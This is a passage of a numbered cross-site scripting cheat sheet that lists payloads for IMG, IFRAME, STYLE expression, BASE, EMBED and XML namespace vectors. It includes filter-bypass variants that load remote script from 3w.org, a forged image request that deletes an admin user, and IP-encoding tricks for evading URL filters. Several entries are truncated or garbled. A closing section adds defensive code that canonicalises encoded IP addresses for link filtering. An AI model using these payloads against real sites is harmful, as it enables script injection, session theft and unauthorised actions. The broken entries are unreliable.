(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (form: an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash lets you mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code in an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg is on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Trailing dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
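
Added example, not part of the original list: entries (70) to (73) spell one address in decimal, hexadecimal, octal and mixed form, so a link filter has to canonicalise the host before comparing it against a block list. The function names are hypothetical, the samples are constructed from those entries, and the whitespace inside the mixed-encoding sample is assumed to be a newline and tabs.

```javascript
// Added example (not from the original page): canonicalise the IPv4 host of an
// href before filtering, using inet_aton-style rules as URL parsers do.

// One dotted part: 0x.. is hex, a leading 0 is octal, otherwise decimal.
function parsePart(s) {
  if (/^0x[0-9a-f]*$/i.test(s)) return s.length === 2 ? 0 : parseInt(s.slice(2), 16);
  if (/^0[0-7]*$/.test(s)) return parseInt(s, 8);
  if (/^[1-9][0-9]*$/.test(s)) return parseInt(s, 10);
  return NaN; // not numeric: the host is a DNS name
}

// Return "a.b.c.d" for any numeric IPv4 spelling, or null for a name.
function canonicalIPv4(host) {
  const parts = host.replace(/\.$/, "").split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  // Leading parts are one byte each; the last part fills the remaining bytes.
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let value = last;
  nums.forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((s) => Math.floor(value / 2 ** s) % 256).join(".");
}

// Host of an href; tab, CR and LF are dropped first, as URL parsers do.
function hostOf(href) {
  const cleaned = href.replace(/[\t\r\n]/g, "").trim();
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^\/?#]*)/i.exec(cleaned);
  return m ? m[1].replace(/^.*@/, "").replace(/:\d*$/, "").toLowerCase() : null;
}

// Flag links whose canonical address is loopback, private or link-local.
function classifyHref(href) {
  const host = hostOf(href);
  const ip = host === null ? null : canonicalIPv4(host);
  const internal = ip !== null &&
    /^(127|10|192\.168|169\.254|172\.(1[6-9]|2\d|3[01]))\./.test(ip);
  return { host, ip, internal };
}

// Constructed samples modelled on the entries above.
const samples = ["http://3232235521", "http://0xc0.0xa8.0x00.0x01",
  "http://0300.0250.0000.0001", "h\ntt\tp://6\t6.000146.0x7.147/",
  "http://www.google.com./", "//www.google.com/"];
for (const href of samples) console.log(JSON.stringify(href), classifyHref(href));
```

The decimal, hexadecimal and octal samples all resolve to 192.168.0.1, which is why a check against the literal string misses them.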